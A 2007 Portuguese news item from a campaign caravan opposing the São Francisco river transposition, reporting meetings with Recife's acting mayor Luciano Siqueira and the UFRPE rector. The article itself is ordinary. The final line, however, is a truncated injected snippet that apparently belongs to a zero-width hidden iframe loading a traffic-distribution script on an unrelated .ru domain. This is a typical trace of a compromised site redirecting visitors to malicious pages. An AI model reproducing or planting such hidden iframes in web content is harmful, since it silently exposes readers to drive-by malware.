Outros
28.08.2007
Caravana encontra com prefeito de Recife
Caravana encontra com prefeito de Recife

Voltar


Por Humberto Santos - Assessoria de Comunicação da Caravana

Recife + Uma ligação no meio da manhã e uma alteração na agenda do dia. Uma audiência da Caravana com o vice-prefeito de Recife, Luciano Siqueira (PC do B), em exercício no cargo de prefeito, já que o titular estava fora do município.

Luciano Siqueira ouviu os objetivos do grupo. Apolo Heringer lembrou que Pernambuco possui cerca de 70% de seu território na bacia do Velho Chico. João Suassuna falou das alternativas para a seca no Semi-árido. Ruben Siqueira disse ao prefeito que Pernambuco não precisava entrar no barco furado da transposição. O estado foi "beneficiado" no projeto só para justificar o "Nordeste setentrional". Ssegundo Ruben, uma invenção para dividir o Nordeste. Ana Rúbia Carvalho, promotora do Ministério Público de Pernambuco, informou ao vice-prefeito que o projeto é inconstitucional.

Luciano Siqueira disse que ficou sabendo da chegada da Caravana à capital de Pernambuco pela imprensa e que se tivesse avisado antes, tinha preparado um debate com representantes contrários na prefeitura. Mesmo assim, ele acredita que a Caravana está desempenhando um papel importante ao buscar o diálogo pelo país para decidir o futuro de uma obra tão grande. "Sei que o governo Lula tem muitas conquistas, mas tem também muitos problemas", afirmou o vice-prefeito.

Apolo Heringer pediu que Luciano abrisse o debate sobre a transposição no PC do B. O vice-prefeito assumiu o compromisso de levar essa discussão adiante, tanto no seu partido, como no município. "Do meu ponto de vista pessoal, como militante, como cidadão, me sinto muito bem com a visita de vocês e com a convicção que carregam no jeito de falar", disse o vice-prefeito, ao se despedir da Caravana.

UFRPE

A Caravana também se encontrou com o reitor da Universidade Federal Rural de Pernambuco (UFRPE). Acompanharam os membros da Caravana no encontro representantes do Diretório Central dos Estudantes da Rural, do Diretório Acadêmico de Biologia, da Andes (Associação dos Docentes da Universidade Federal de Pernambuco), do Sintufepe (Sindicato dos Servidores da Universidade Federal de Pernambuco).

O reitor da UFRPE, professor Valmar Corrêa de Andrade, ouviu os relatos dos membros da Caravana e depois de ser solicitado a abrir e sediar o debate sobre o Semi-Árido na instituição, ele firmou o compromisso de estimular o debate e dar todo o apoio na discussão do tema, não só na capital, mas também nas unidades da Rural em Serra Talhada e Garanhuns.

rc="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="